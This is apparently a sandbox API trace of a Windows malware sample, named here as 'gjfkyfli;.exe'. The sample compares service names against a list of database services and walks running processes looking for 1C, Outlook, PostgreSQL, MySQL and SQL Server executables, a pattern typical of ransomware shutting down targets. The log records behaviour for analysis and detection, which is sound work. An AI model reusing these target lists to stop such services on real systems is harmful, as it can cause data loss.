	[0140.285] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1
	[0140.285] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1
	[0140.285] lstrlenW (lpString="LanmanWorkstation") returned 17
	[0140.285] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0140.285] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0140.285] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1
	[0140.285] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1
	[0140.285] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1
	[0140.285] lstrlenW (lpString="lmhosts") returned 7
	[0140.285] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1
	[0140.285] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1
	[0140.285] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1
	[0140.286] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1
	[0140.286] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1
	[0140.286] lstrlenW (lpString="MMCSS") returned 5
	[0140.286] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1
	[0140.286] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1
	[0140.286] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1
	[0140.286] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1
	[0140.286] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1
	[0140.286] lstrlenW (lpString="MpsSvc") returned 6
	[0140.286] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1
	[0140.286] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1
	[0140.286] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1
	[0140.286] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1
	[0140.286] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1
	[0140.286] lstrlenW (lpString="NlaSvc") returned 6
	[0140.286] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1
	[0140.286] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1
	[0140.286] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1
	[0140.286] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1
	[0140.286] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1
	[0140.286] lstrlenW (lpString="nsi") returned 3
	[0140.286] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1
	[0140.286] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1
	[0140.286] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1
	[0140.286] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1
	[0140.286] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1
	[0140.286] lstrlenW (lpString="PcaSvc") returned 6
	[0140.286] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1
	[0140.286] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1
	[0140.286] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1
	[0140.286] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1
	[0140.286] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1
	[0140.286] lstrlenW (lpString="PlugPlay") returned 8
	[0140.286] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1
	[0140.287] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1
	[0140.287] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1
	[0140.287] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1
	[0140.287] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1
	[0140.287] lstrlenW (lpString="Power") returned 5
	[0140.287] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1
	[0140.287] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1
	[0140.287] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1
	[0140.287] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1
	[0140.287] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1
	[0140.287] lstrlenW (lpString="ProfSvc") returned 7
	[0140.287] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1
	[0140.287] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1
	[0140.287] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1
	[0140.287] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1
	[0140.287] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1
	[0140.287] lstrlenW (lpString="RpcEptMapper") returned 12
	[0140.287] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0140.287] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0140.287] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1
	[0140.287] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1
	[0140.287] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1
	[0140.287] lstrlenW (lpString="RpcSs") returned 5
	[0140.287] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1
	[0140.287] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1
	[0140.287] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1
	[0140.287] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1
	[0140.287] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1
	[0140.287] lstrlenW (lpString="SamSs") returned 5
	[0140.287] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1
	[0140.287] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1
	[0140.287] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1
	[0140.287] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1
	[0140.287] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1
	[0140.287] lstrlenW (lpString="Schedule") returned 8
	[0140.288] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1
	[0140.288] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1
	[0140.288] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1
	[0140.288] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1
	[0140.288] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1
	[0140.288] lstrlenW (lpString="SENS") returned 4
	[0140.288] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1
	[0140.288] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1
	[0140.288] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1
	[0140.288] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1
	[0140.288] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1
	[0140.288] lstrlenW (lpString="ShellHWDetection") returned 16
	[0140.288] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0140.288] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0140.288] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1
	[0140.288] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1
	[0140.288] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1
	[0140.288] lstrlenW (lpString="Spooler") returned 7
	[0140.288] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1
	[0140.288] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1
	[0140.288] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1
	[0140.288] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1
	[0140.288] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1
	[0140.288] lstrlenW (lpString="Themes") returned 6
	[0140.288] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1
	[0140.288] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1
	[0140.288] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1
	[0140.288] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1
	[0140.288] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1
	[0140.288] lstrlenW (lpString="UxSms") returned 5
	[0140.288] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1
	[0140.288] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1
	[0140.288] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1
	[0140.288] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1
	[0140.289] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1
	[0140.289] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0xb612378 | out: hHeap=0x7ab0000) returned 1
	[0140.289] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x3c0
	[0140.291] Process32FirstW (in: hSnapshot=0x3c0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0140.291] Process32NextW (in: hSnapshot=0x3c0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4c, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0140.291] lstrlenW (lpString="System") returned 6
	[0140.291] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1
	[0140.291] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1
	[0140.291] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1
	[0140.291] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1
	[0140.291] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1
	[0140.291] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1
	[0140.291] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1
	[0140.291] Process32NextW (in: hSnapshot=0x3c0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0140.292] lstrlenW (lpString="smss.exe") returned 8
	[0140.292] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1
	[0140.292] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1
	[0140.292] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1
	[0140.292] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1
	[0140.292] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1
	[0140.292] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1
	[0140.292] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1
	[0140.292] Process32NextW (in: hSnapshot=0x3c0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0140.292] lstrlenW (lpString="csrss.exe") returned 9
	[0140.292] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1
	[0140.292] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1
	[0140.292] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1
	[0140.292] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1
	[0140.292] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1
	[0140.292] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1
	[0140.292] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1
	[0140.292] Process32NextW (in: hSnapshot=0x3c0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0140.293] lstrlenW (lpString="wininit.exe") returned 11
	[0140.293] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1
	[0140.293] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1
	[0140.293] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1
	[0140.293] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1
	[0140.293] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1
	[0140.293] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1
	[0140.293] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1
	[0140.293] Process32NextW (in: hSnapshot=0x3c0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0140.293] lstrlenW (lpString="csrss.exe") returned 9
	[0140.293] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1
	[0140.293] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1
	[0140.293] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1
	[0140.293] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1
	[0140.293] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1
	[0140.293] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1
	[0140.293] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1
	[0140.293] Process32NextW (in: hSnapshot=0x3c0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0140.294] lstrlenW (lpString="winlogon.exe") returned 12
	[0140.294] lstrcmpiW (lpString1="1c8.exe", lpString2="winlogon.exe") returned -1
	[0140.294] lstrcmpiW (lpString1="1cv77.exe", lpString2="winlogon.exe") returned -1
	[0140.294] lstrcmpiW (lpString1="outlook.exe", lpString2="winlogon.exe") returned -1
	[0140.294] lstrcmpiW (lpString1="postgres.exe", lpString2="winlogon.exe") returned -1
	[0140.294] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="winlogon.exe") returned -1
	[0140.294] lstrcmpiW (lpString1="mysqld.exe", lpString2="winlogon.exe") returned -1
	[0140.294] lstrcmpiW (lpString1="sqlservr.exe", lpString2="winlogon.exe") returned -1
	[0140.294] Process32NextW (in: hSnapshot=0x3c0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0140.295] lstrlenW (lpString="services.exe") returned 12
	[0140.295] lstrcmpiW (lpString1="1c8.exe", lpString2="services.exe") returned -1
	[0140.295] lstrcmpiW (lpString1="1cv77.exe", lpString2="services.exe") returned -1
	[0140.295] lstrcmpiW (lpString1="outlook.exe", lpString2="services.exe") returned -1
	[0140.295] lstrcmpiW (lpString1="postgres.exe", lpString2="services.exe") returned -1
	[0140.295] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="services.exe") returned -1
	[0140.295] lstrcmpiW (lpString1="mysqld.exe", lpString2="services.exe") returned -1
	[0140.295] lstrcmpiW (lpString1="sqlservr.exe", lpString2="services.exe") returned 1
	[0140.295] Process32NextW (in: hSnapshot=0x3c0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0140.295] lstrlenW (lpString="lsass.exe") returned 9
	[0140.295] lstrcmpiW (lpString1="1c8.exe", lpString2="lsass.exe") returned -1
	[0140.295] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsass.exe") returned -1
	[0140.295] lstrcmpiW (lpString1="outlook.exe", lpString2="lsass.exe") returned 1
	[0140.295] lstrcmpiW (lpString1="postgres.exe", lpString2="lsass.exe") returned 1
	[0140.295] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsass.exe") returned 1
	[0140.295] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsass.exe") returned 1
	[0140.295] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsass.exe") returned 1
	[0140.295] Process32NextW (in: hSnapshot=0x3c0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0140.296] lstrlenW (lpString="lsm.exe") returned 7
	[0140.296] lstrcmpiW (lpString1="1c8.exe", lpString2="lsm.exe") returned -1
	[0140.296] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsm.exe") returned -1
	[0140.296] lstrcmpiW (lpString1="outlook.exe", lpString2="lsm.exe") returned 1
	[0140.296] lstrcmpiW (lpString1="postgres.exe", lpString2="lsm.exe") returned 1
	[0140.296] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsm.exe") returned 1
	[0140.296] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsm.exe") returned 1
	[0140.296] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsm.exe") returned 1
	[0140.296] Process32NextW (in: hSnapshot=0x3c0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0140.296] lstrlenW (lpString="svchost.exe") returned 11
	[0140.296] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1
	[0140.296] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1
	[0140.296] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1
	[0140.296] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1
	[0140.296] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1
	[0140.296] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1
	[0140.296] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1
	[0140.296] Process32NextW (in: hSnapshot=0x3c0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0140.297] lstrlenW (lpString="svchost.exe") returned 11
	[0140.297] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1
	[0140.297] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1
	[0140.297] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1
	[0140.297] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1
	[0140.297] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1
	[0140.297] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1
	[0140.297] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1
	[0140.297] Process32NextW (in: hSnapshot=0x3c0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0140.297] lstrlenW (lpString="svchost.exe") returned 11
	[0140.297] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1
	[0140.297] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1
	[0140.297] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1
	[0140.297] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1
	[0140.297] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1
	[0140.297] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1
	[0140.297] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1
	[0140.297] Process32NextW (in: hSnapshot=0x3c0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0140.298] lstrlenW (lpString="svchost.exe") returned 11
	[0140.298] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1
	[0140.298] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1
	[0140.298] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1
	[0140.298] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1
	[0140.298] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1
	[0140.298] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1
	[0140.298] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1
	[0140.298] Process32NextW (in: hSnapshot=0x3c0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0140.298] lstrlenW (lpString="svchost.exe") returned 11
	[0140.299] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1
	[0140.299] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1
	[0140.299] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1
	[0140.299] Process32NextW (in: hSnapshot=0x3c0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0140.299] lstrlenW (lpString="audiodg.exe") returned 11
	[0140.299] Process32NextW (in: hSnapshot=0x3c0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0140.299] lstrlenW (lpString="svchost.exe") returned 11
	[0140.299] Process32NextW (in: hSnapshot=0x3c0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0140.300] lstrlenW (lpString="svchost.exe") returned 11
	[0140.300] Process32NextW (in: hSnapshot=0x3c0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0140.300] lstrlenW (lpString="spoolsv.exe") returned 11
	[0140.300] Process32NextW (in: hSnapshot=0x3c0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0140.300] lstrlenW (lpString="svchost.exe") returned 11
	[0140.300] Process32NextW (in: hSnapshot=0x3c0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x474, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0140.301] lstrlenW (lpString="taskhost.exe") returned 12
	[0140.301] Process32NextW (in: hSnapshot=0x3c0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1
	[0140.301] lstrlenW (lpString="userinit.exe") returned 12
	[0140.301] Process32NextW (in: hSnapshot=0x3c0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x338, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0140.301] lstrlenW (lpString="dwm.exe") returned 7
	[0140.301] Process32NextW (in: hSnapshot=0x3c0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x4c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0140.302] lstrlenW (lpString="explorer.exe") returned 12
	[0140.302] Process32NextW (in: hSnapshot=0x3c0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x4ec, pcPriClassBase=8, dwFlags=0x0, szExeFile="gjfkyfli;.exe")) returned 1
	[0140.302] lstrlenW (lpString="gjfkyfli;.exe") returned 13
